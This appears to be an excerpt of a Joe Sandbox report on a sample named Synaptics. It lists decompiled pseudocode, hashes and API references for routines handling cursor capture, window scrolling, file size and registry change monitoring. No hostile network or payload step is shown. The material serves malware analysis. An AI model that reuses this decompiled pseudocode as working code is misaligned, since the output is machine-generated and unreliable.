                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                            • Opcode ID: d7b8b7849bcb72c5027e917725a1694d305817c4d1b349c38790e114d213c5c8
                                                                                                                                                                                                                            • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7b8b7849bcb72c5027e917725a1694d305817c4d1b349c38790e114d213c5c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004392CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x49eb34 = __eax;
				_push(_t133);
				_push(0x439471);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x49eb3c = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E00403DE8(__eax, __eflags);
					__eflags =  *0x49eb34;
					if( *0x49eb34 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E00438690(1, _t124);
							 *0x49eb3c = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x437498; // 0x4374e4
						_t54 = E00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E004197DC(0,  &_v36, 0);
								E0043AA94(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)));
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x437498; // 0x4374e4
							_t71 = E00403D78(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E00441704(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E0043915C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E00403DE8(__eax, _t135);
				if( *0x49eb34 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00438578(_t124, 1);
						 *0x49eb3c = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}



























                                                                                                                                                                                                                            0x004392cc
                                                                                                                                                                                                                            0x004392d5
                                                                                                                                                                                                                            0x004392d8
                                                                                                                                                                                                                            0x004392da
                                                                                                                                                                                                                            0x004392dc
                                                                                                                                                                                                                            0x004392e4
                                                                                                                                                                                                                            0x004392e5
                                                                                                                                                                                                                            0x004392ea
                                                                                                                                                                                                                            0x004392ed
                                                                                                                                                                                                                            0x004392f2
                                                                                                                                                                                                                            0x004392f5
                                                                                                                                                                                                                            0x004392fc
                                                                                                                                                                                                                            0x00439303
                                                                                                                                                                                                                            0x00439359
                                                                                                                                                                                                                            0x0043935e
                                                                                                                                                                                                                            0x00439365
                                                                                                                                                                                                                            0x00439374
                                                                                                                                                                                                                            0x00439378
                                                                                                                                                                                                                            0x00439388
                                                                                                                                                                                                                            0x0043938b
                                                                                                                                                                                                                            0x0043938b
                                                                                                                                                                                                                            0x00439395
                                                                                                                                                                                                                            0x0043939a
                                                                                                                                                                                                                            0x004393a0
                                                                                                                                                                                                                            0x004393a5
                                                                                                                                                                                                                            0x004393a7
                                                                                                                                                                                                                            0x004393c5
                                                                                                                                                                                                                            0x004393c8
                                                                                                                                                                                                                            0x004393cc
                                                                                                                                                                                                                            0x004393f9
                                                                                                                                                                                                                            0x004393fe
                                                                                                                                                                                                                            0x00439400
                                                                                                                                                                                                                            0x0043940d
                                                                                                                                                                                                                            0x00439412
                                                                                                                                                                                                                            0x00439418
                                                                                                                                                                                                                            0x0043941e
                                                                                                                                                                                                                            0x00439421
                                                                                                                                                                                                                            0x00439433
                                                                                                                                                                                                                            0x00439439
                                                                                                                                                                                                                            0x0043943e
                                                                                                                                                                                                                            0x00439444
                                                                                                                                                                                                                            0x0043944a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043944a
                                                                                                                                                                                                                            0x004393d0
                                                                                                                                                                                                                            0x004393d6
                                                                                                                                                                                                                            0x004393db
                                                                                                                                                                                                                            0x004393dd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004393e3
                                                                                                                                                                                                                            0x004393e8
                                                                                                                                                                                                                            0x004393ee
                                                                                                                                                                                                                            0x004393f4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004393a9
                                                                                                                                                                                                                            0x004393b8
                                                                                                                                                                                                                            0x0043944d
                                                                                                                                                                                                                            0x00439456
                                                                                                                                                                                                                            0x00439457
                                                                                                                                                                                                                            0x00439458
                                                                                                                                                                                                                            0x00439459
                                                                                                                                                                                                                            0x0043945a
                                                                                                                                                                                                                            0x00439462
                                                                                                                                                                                                                            0x00439469
                                                                                                                                                                                                                            0x0043946c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043946c
                                                                                                                                                                                                                            0x004393a7
                                                                                                                                                                                                                            0x00439369
                                                                                                                                                                                                                            0x0043936c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043936c
                                                                                                                                                                                                                            0x0043930e
                                                                                                                                                                                                                            0x0043931a
                                                                                                                                                                                                                            0x00439329
                                                                                                                                                                                                                            0x0043932d
                                                                                                                                                                                                                            0x00439341
                                                                                                                                                                                                                            0x00439344
                                                                                                                                                                                                                            0x00439344
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043932d
                                                                                                                                                                                                                            0x0043931e
                                                                                                                                                                                                                            0x00439321
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: \`C$tC
                                                                                                                                                                                                                            • API String ID: 0-3452953066
                                                                                                                                                                                                                            • Opcode ID: e5d5e564f27f167b08a4427dd497db7147cd8b509a43d3ade783cb6889831ebe
                                                                                                                                                                                                                            • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5d5e564f27f167b08a4427dd497db7147cd8b509a43d3ade783cb6889831ebe
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043915C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x49eb38 = __eax;
				_t24 =  *0x49eb38; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x49eb44);
				_t26 =  *0x49eb38; // 0x0
				_t58 = 0x49eb44->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x49eb48; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x49eb4c = GetCursor();
				_t28 =  *0x49eb38; // 0x0
				 *0x49eb40 = E00438388(_t28);
				 *0x49eb50 = _t70;
				_t60 =  *0x4360a0; // 0x4360ec
				if(E00403D78(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x49eb38; // 0x0
				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x49eb58;
				if( *0x49eb58 != 0) {
					_t37 =  *0x49eb48; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x49eb58; // 0x0
					E00443038(_t39, _t38, _t85, _t37);
				}
				_t35 = E00403BBC(1);
				 *0x49eb60 = _t35;
				if( *0x49eb54 != 0) {
					_t35 = E00438E8C(0x49eb44, 1);
				}
				return _t35;
			}


























                                                                                                                                                                                                                            0x0043915c
                                                                                                                                                                                                                            0x0043915f
                                                                                                                                                                                                                            0x00439162
                                                                                                                                                                                                                            0x00439164
                                                                                                                                                                                                                            0x00439166
                                                                                                                                                                                                                            0x00439168
                                                                                                                                                                                                                            0x0043916e
                                                                                                                                                                                                                            0x00439175
                                                                                                                                                                                                                            0x0043917d
                                                                                                                                                                                                                            0x00439182
                                                                                                                                                                                                                            0x00439187
                                                                                                                                                                                                                            0x0043918d
                                                                                                                                                                                                                            0x00439190
                                                                                                                                                                                                                            0x00439196
                                                                                                                                                                                                                            0x0043919e
                                                                                                                                                                                                                            0x004391a3
                                                                                                                                                                                                                            0x004391ad
                                                                                                                                                                                                                            0x004391b2
                                                                                                                                                                                                                            0x004391ba
                                                                                                                                                                                                                            0x004391c7
                                                                                                                                                                                                                            0x00439259
                                                                                                                                                                                                                            0x0043925b
                                                                                                                                                                                                                            0x00439266
                                                                                                                                                                                                                            0x0043925d
                                                                                                                                                                                                                            0x0043925d
                                                                                                                                                                                                                            0x0043925d
                                                                                                                                                                                                                            0x004391cd
                                                                                                                                                                                                                            0x004391cd
                                                                                                                                                                                                                            0x004391cf
                                                                                                                                                                                                                            0x004391cf
                                                                                                                                                                                                                            0x004391d5
                                                                                                                                                                                                                            0x004391db
                                                                                                                                                                                                                            0x004391fd
                                                                                                                                                                                                                            0x004391ff
                                                                                                                                                                                                                            0x00439202
                                                                                                                                                                                                                            0x004391dd
                                                                                                                                                                                                                            0x004391e2
                                                                                                                                                                                                                            0x004391e5
                                                                                                                                                                                                                            0x004391ed
                                                                                                                                                                                                                            0x004391f1
                                                                                                                                                                                                                            0x004391f5
                                                                                                                                                                                                                            0x004391f7
                                                                                                                                                                                                                            0x004391fa
                                                                                                                                                                                                                            0x004391fa
                                                                                                                                                                                                                            0x00439208
                                                                                                                                                                                                                            0x0043920f
                                                                                                                                                                                                                            0x00439234
                                                                                                                                                                                                                            0x00439236
                                                                                                                                                                                                                            0x00439239
                                                                                                                                                                                                                            0x00439211
                                                                                                                                                                                                                            0x00439211
                                                                                                                                                                                                                            0x00439218
                                                                                                                                                                                                                            0x0043921b
                                                                                                                                                                                                                            0x00439224
                                                                                                                                                                                                                            0x00439228
                                                                                                                                                                                                                            0x0043922c
                                                                                                                                                                                                                            0x0043922e
                                                                                                                                                                                                                            0x00439231
                                                                                                                                                                                                                            0x00439231
                                                                                                                                                                                                                            0x0043923e
                                                                                                                                                                                                                            0x00439250
                                                                                                                                                                                                                            0x00439240
                                                                                                                                                                                                                            0x00439240
                                                                                                                                                                                                                            0x0043924b
                                                                                                                                                                                                                            0x0043924b
                                                                                                                                                                                                                            0x0043923e
                                                                                                                                                                                                                            0x0043926d
                                                                                                                                                                                                                            0x00439277
                                                                                                                                                                                                                            0x0043927c
                                                                                                                                                                                                                            0x00439283
                                                                                                                                                                                                                            0x00439285
                                                                                                                                                                                                                            0x0043928b
                                                                                                                                                                                                                            0x00439298
                                                                                                                                                                                                                            0x0043929d
                                                                                                                                                                                                                            0x0043929d
                                                                                                                                                                                                                            0x004392a9
                                                                                                                                                                                                                            0x004392ae
                                                                                                                                                                                                                            0x004392ba
                                                                                                                                                                                                                            0x004392c1
                                                                                                                                                                                                                            0x004392c1
                                                                                                                                                                                                                            0x004392cb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                                                                                                                                                                                            • GetCursor.USER32(0049EB44), ref: 00439199
                                                                                                                                                                                                                              • Part of subcall function 00438388: SetCapture.USER32(00000000,Function_0003850C,00000000,?,004391AD,0049EB44), ref: 00438397
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0043928B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor$CaptureDesktopWindow
                                                                                                                                                                                                                            • String ID: `C
                                                                                                                                                                                                                            • API String ID: 669539147-1847193361
                                                                                                                                                                                                                            • Opcode ID: cfadc6313aaa1f90bca02bf8b4a617acf16d5f6779200e1ed14d9dce04a29a12
                                                                                                                                                                                                                            • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfadc6313aaa1f90bca02bf8b4a617acf16d5f6779200e1ed14d9dce04a29a12
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004412BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E0043E434(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E0043DFC4();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E0043E3F8(_t54, _t58);
						_t47 =  *0x437498; // 0x4374e4
						if(E00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}












                                                                                                                                                                                                                            0x004412c3
                                                                                                                                                                                                                            0x004412c7
                                                                                                                                                                                                                            0x004412ca
                                                                                                                                                                                                                            0x004412cc
                                                                                                                                                                                                                            0x004412d4
                                                                                                                                                                                                                            0x004412e0
                                                                                                                                                                                                                            0x004412e4
                                                                                                                                                                                                                            0x004412e4
                                                                                                                                                                                                                            0x004412e4
                                                                                                                                                                                                                            0x004412e6
                                                                                                                                                                                                                            0x004412ef
                                                                                                                                                                                                                            0x00441306
                                                                                                                                                                                                                            0x00441306
                                                                                                                                                                                                                            0x00441314
                                                                                                                                                                                                                            0x00441317
                                                                                                                                                                                                                            0x00441385
                                                                                                                                                                                                                            0x00441393
                                                                                                                                                                                                                            0x00441319
                                                                                                                                                                                                                            0x00441319
                                                                                                                                                                                                                            0x0044131a
                                                                                                                                                                                                                            0x0044131c
                                                                                                                                                                                                                            0x00441325
                                                                                                                                                                                                                            0x00441329
                                                                                                                                                                                                                            0x00441336
                                                                                                                                                                                                                            0x00441344
                                                                                                                                                                                                                            0x0044134b
                                                                                                                                                                                                                            0x00441350
                                                                                                                                                                                                                            0x00441355
                                                                                                                                                                                                                            0x0044137c
                                                                                                                                                                                                                            0x0044137c
                                                                                                                                                                                                                            0x00441355
                                                                                                                                                                                                                            0x00441381
                                                                                                                                                                                                                            0x00441382
                                                                                                                                                                                                                            0x00441382
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044131c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004412D7
                                                                                                                                                                                                                            • ScrollWindow.USER32 ref: 00441306
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ScrollVisible
                                                                                                                                                                                                                            • String ID: tC
                                                                                                                                                                                                                            • API String ID: 4127837035-1085749316
                                                                                                                                                                                                                            • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                                                            • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047D01C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                            • String ID: lI
                                                                                                                                                                                                                            • API String ID: 1378416451-2224401619
                                                                                                                                                                                                                            • Opcode ID: 276f590887ad0535c7e68d232454b0f634ad648d5ad298078717613331d07dc5
                                                                                                                                                                                                                            • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 276f590887ad0535c7e68d232454b0f634ad648d5ad298078717613331d07dc5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00494694 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00494694(void* __eax) {
				long _t18;
				void* _t20;
				void* _t21;

				_t21 = __eax;
				 *((intOrPtr*)(__eax + 0x48)) = 5;
				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
				asm("cmc");
				asm("sbb eax, eax");
				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
				if(_t18 != 0) {
					_t20 = E0040D144("Can not start monitoring", 1);
					E00404378();
					return _t20;
				}
				return _t18;
			}






                                                                                                                                                                                                                            0x00494695
                                                                                                                                                                                                                            0x00494697
                                                                                                                                                                                                                            0x004946ab
                                                                                                                                                                                                                            0x004946bb
                                                                                                                                                                                                                            0x004946cf
                                                                                                                                                                                                                            0x004946d0
                                                                                                                                                                                                                            0x004946da
                                                                                                                                                                                                                            0x004946e1
                                                                                                                                                                                                                            0x004946ef
                                                                                                                                                                                                                            0x004946f4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004946f4
                                                                                                                                                                                                                            0x004946fa

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
                                                                                                                                                                                                                            • RegNotifyChangeKeyValue.ADVAPI32(?,?,00000005,?,000000FF,00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946DA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • Can not start monitoring, xrefs: 004946E3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateEvent$ChangeNotifyValue
